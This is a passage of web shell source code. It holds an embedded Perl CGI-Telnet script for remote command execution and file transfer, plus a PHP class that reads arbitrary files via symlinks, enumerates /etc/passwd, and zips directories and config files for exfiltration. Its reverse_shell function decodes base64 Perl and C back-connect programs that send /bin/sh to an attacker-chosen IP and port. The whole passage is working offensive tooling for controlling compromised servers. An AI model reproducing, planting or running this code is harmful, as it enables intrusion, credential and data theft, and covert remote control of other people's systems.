		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # file doesn't exist
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $FileUrl: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
	local($SendFile) = @_;
	if(open(SENDFILE, $SendFile)) # file opened for reading
	{
		if($WinNT)
		{
			binmode(SENDFILE);
			binmode(STDOUT);
		}
		$FileSize = (stat($SendFile))[7];
		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
		print "Content-Type: application/x-unknown\n";
		print "Content-Length: $FileSize\n";
		print "Content-Disposition: attachment; filename=$1\n\n";
		print while(<SENDFILE>);
		close(SENDFILE);
	}
	else # failed to open file
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $SendFile: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
	# if no file is specified, print the upload form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileUploadForm;
		&PrintPageFooter;
		return;
	}
	&PrintPageHeader("c");

	# start the uploading process
	print "<code>Uploading $TransferFile to $CurrentDir...<br>";

	# get the fullly qualified pathname of the file to be created
	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
	$TransferFile =~ m!([^/^\\]*)$!;
	$TargetName .= $PathSep.$1;

	$TargetFileSize = length($in{'filedata'});
	# if the file exists and we are not supposed to overwrite it
	if(-e $TargetName && $Options ne "overwrite")
	{
		print "Failed: Destination file already exists.<br>";
	}
	else # file is not present
	{
		if(open(UPLOADFILE, ">$TargetName"))
		{
			binmode(UPLOADFILE) if $WinNT;
			print UPLOADFILE $in{'filedata'};
			close(UPLOADFILE);
			print "Transfered $TargetFileSize Bytes.<br>";
			print "File Path: $TargetName<br>";
		}
		else
		{
			print "Failed: $!<br>";
		}
	}
	print "</code>";
	&PrintCommandLineInputForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
	# if no file is specified, print the download form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileDownloadForm;
		&PrintPageFooter;
		return;
	}
	
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
	&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
	&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
	&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
	&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
	&PerformLogout;
}');
if(file_exists($name)){
return true;
}else{
if(@file_put_contents($name,$cgiTelnetCode)){
@chmod($name,octdec("0755"));
return true;
}else{
return false;
}
}
}
public function create_symlink($target){
if(!file_exists($target)){
return false;
}else{
$temp = sys_get_temp_dir().DIRECTORY_SEPARATOR.uniqid(rand(1,50)).".tmp";
if(@symlink($target,$temp)){
$content = @file_get_contents($temp);
@unlink($temp);
return $content;
}elseif(@link($target,$temp)){
$content = @file_get_contents($temp);
@unlink($temp);
return $content;
}else{
$exec_ln = $this->run_cmd('ln -sf '.$target.' '.$temp);
if($exec_ln !== false){
$content = @file_get_contents($temp);
@unlink($temp);
return $content;
}else{return false;}
}
}
}
public function prepare_search_cmd($location,$keyword,$type){
if($type == 'all'){
$cmd = 'find "'.$location.'" -iname "*'.$keyword.'*"';
}elseif($type == 'files_only'){
$cmd = 'find "'.$location.'" -type f -iname "*'.$keyword.'*"';
}elseif($type == 'dirs_only'){
$cmd = 'find "'.$location.'" -type d -iname "*'.$keyword.'*"';
}
return $cmd;
}
public function get_users_count(){
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){
return 'Windows not supported';
}else{
$read_as_arr = @array_map('trim',@file('/etc/passwd'));
return count($read_as_arr);
}
}
public function get_groups_count(){
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){
return 'Windows not supported';
}else{
$read_as_arr = @array_map('trim',@file('/etc/group'));
return count($read_as_arr);
}
}
public function download_as_zip($target){
// https://stackoverflow.com/questions/55927020/how-to-zip-an-entire-folder-in-php-even-the-empty-ones
if(!is_readable($target)) return false;
$rootPath = realpath($target);
$zipFilename = $_SERVER['HTTP_HOST'].'-'.uniqid().'.zip';
$zip = new ZipArchive();
if($zip->open($zipFilename, ZipArchive::CREATE)){
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY);
foreach ($files as $name => $file)
{
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen($rootPath) + 1);
if (!$file->isDir())
{
// Add current file to archive
$zip->addFile($filePath, $relativePath);
}else {
if($relativePath !== false)
$zip->addEmptyDir($relativePath);
}
}
if($zip->status == ZipArchive::ER_OK){
$zip->close();
return $zipFilename;
}else{
$zip->close();
return false;
}
}else{
return false;
}
}
public function download_configs($configs){
$configs = explode("\n",$configs);
$configs = array_filter($configs);
$configs = array_unique($configs);
$configs = array_map('trim',$configs);
$zipTemp = $_SERVER['HTTP_HOST'].'-configs.zip';
$zip = new ZipArchive();
if($zip->open($zipTemp,ZipArchive::CREATE)){
foreach($configs as $config){
$zip->addFile($config,basename($config));
}
if($zip->status == ZipArchive::ER_OK){
$zip->close();
return $zipTemp;
}else{
$zip->close();
return false;
}
}else{
return false;
}
}
public function reverse_shell($ip,$port,$method){
if($method == "perl"){
$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$perl_path = 'mws_rev.pl';
if(@file_put_contents($perl_path,base64_decode($back_connect_pl))){
@chmod($perl_path,octdec("0755"));
$exec_command = $this->run_cmd("perl $perl_path $ip $port &");
if($exec_command !== false){
@unlink($perl_path);
return true;
}else{
@unlink($perl_path);
return false;
}
}else{
return false;
}
}else{
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$c_path = 'mws_rev_c.c';
if(@file_put_contents($c_path,base64_decode($back_connect_c))){
$compile = $this->run_cmd("gcc -o mws_rev_c $c_path");
if($compile !== false){
if(file_exists('mws_rev_c')){
@unlink($c_path);
@chmod('mws_rev_c',octdec("0755"));
$exec_command = $this->run_cmd("./mws_rev_c $ip $port &");
if($exec_command !== false){
@unlink('mws_rev_c');
return true;
}else{@unlink('mws_rev_c');return false;}
}else{
@unlink($c_path);
return false;
}
}else{@unlink($c_path);return false;}
}else{return false;}
}
}
public function get_ip_information(){
$informations = array();
$server_ip = $_SERVER['SERVER_ADDR'];
$sites = array(
'http://ip-api.com/json/'.$server_ip,
'https://ipwhois.app/json/'.$server_ip,
'https://ipapi.co/'.$server_ip.'/json/',
'https://free.ipdetails.io/'.$server_ip,
'https://ipinfo.io/'.$server_ip.'/json');
foreach($sites as $key => $lookup_addr){
if(function_exists('curl_init')){
$curl = curl_init();
curl_setopt_array($curl,array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 OPR/79.0.4143.72',
CURLOPT_URL => $lookup_addr,
CURLOPT_TIMEOUT => 10));
$content = curl_exec($curl);
curl_close($curl);
}elseif(function_exists('file_get_contents')){
$options = stream_context_create(array("http" => array("timeout" => 10)));
$content = file_get_contents($lookup_addr,false,$options);
}elseif(function_exists('fopen')){
$options = stream_context_create(array("http" => array("timeout" => 10)));
$fopen = fopen($lookup_addr,'r',false,$options);
if($fopen){
$content = '';
while($read = fread($fopen,1024)){
$content .= $read;
}
fclose($fopen);
}
}
if($content){
$decode = json_decode($content);
if($key == 0){
if($decode->status){
$informations['ip'] = $server_ip;
$informations['country'] = $decode->country;
$informations['city'] = $decode->city;
$informations['region'] = $decode->regionName;
$informations['timezone'] = $decode->timezone;
}else{
$informations['ip'] = $server_ip;
$informations['country'] = 'Unknown';
$informations['city'] = 'Unknown';
$informations['region'] = 'Unknown';
$informations['timezone'] = 'Unknown';
}
}elseif($key == 1){
if($decode->success){
$informations['ip'] = $server_ip;
$informations['country'] = $decode->country;
$informations['city'] = $decode->city;
$informations['region'] = $decode->region;
$informations['timezone'] = $decode->timezone;
}else{
$informations['ip'] = $server_ip;
$informations['country'] = 'Unknown';
$informations['city'] = 'Unknown';
$informations['region'] = 'Unknown';
$informations['timezone'] = 'Unknown';
}
}elseif($key == 2){
if($decode->country_name){
$informations['ip'] = $server_ip;
$informations['country'] = $decode->country_name;
$informations['city'] = $decode->city;
$informations['region'] = $decode->region;
$informations['timezone'] = $decode->timezone;
}else{
$informations['ip'] = $server_ip;
$informations['country'] = 'Unknown';
$informations['city'] = 'Unknown';
$informations['region'] = 'Unknown';
$informations['timezone'] = 'Unknown';
}
}elseif($key == 3){
if($decode->status){
$informations['ip'] = $server_ip;
$informations['country'] = $decode->country->country_long;
$informations['city'] = $decode->region->city;
$informations['region'] = $decode->region->region;
$informations['timezone'] = $decode->timezone->timezone;
}else{
$informations['ip'] = $server_ip;
$informations['country'] = 'Unknown';
$informations['city'] = 'Unknown';
$informations['region'] = 'Unknown';
$informations['timezone'] = 'Unknown';
}
}elseif($key == 4){
if($decode->country){
$informations['ip'] = $server_ip;
$informations['country'] = $decode->country;
$informations['city'] = $decode->city;
$informations['region'] = $decode->region;
$informations['timezone'] = $decode->timezone;
}else{
$informations['ip'] = $server_ip;
$informations['country'] = 'Unknown';
$informations['city'] = 'Unknown';
$informations['region'] = 'Unknown';
$informations['timezone'] = 'Unknown';
}
}
}
if(!empty($informations)) break;
}
return $informations;
}
public function getMimeType( $filename ) {
$realpath = realpath( $filename );
if ( $realpath
&& function_exists( 'finfo_file' )
&& function_exists( 'finfo_open' )
&& defined( 'FILEINFO_MIME_TYPE' )
) {
// Use the Fileinfo PECL extension (PHP 5.3+)
return finfo_file( finfo_open( FILEINFO_MIME_TYPE ), $realpath );
}
if ( function_exists( 'mime_content_type' ) ) {
// Deprecated in PHP 5.3
return mime_content_type( $realpath );
}
return false;
}
}
?>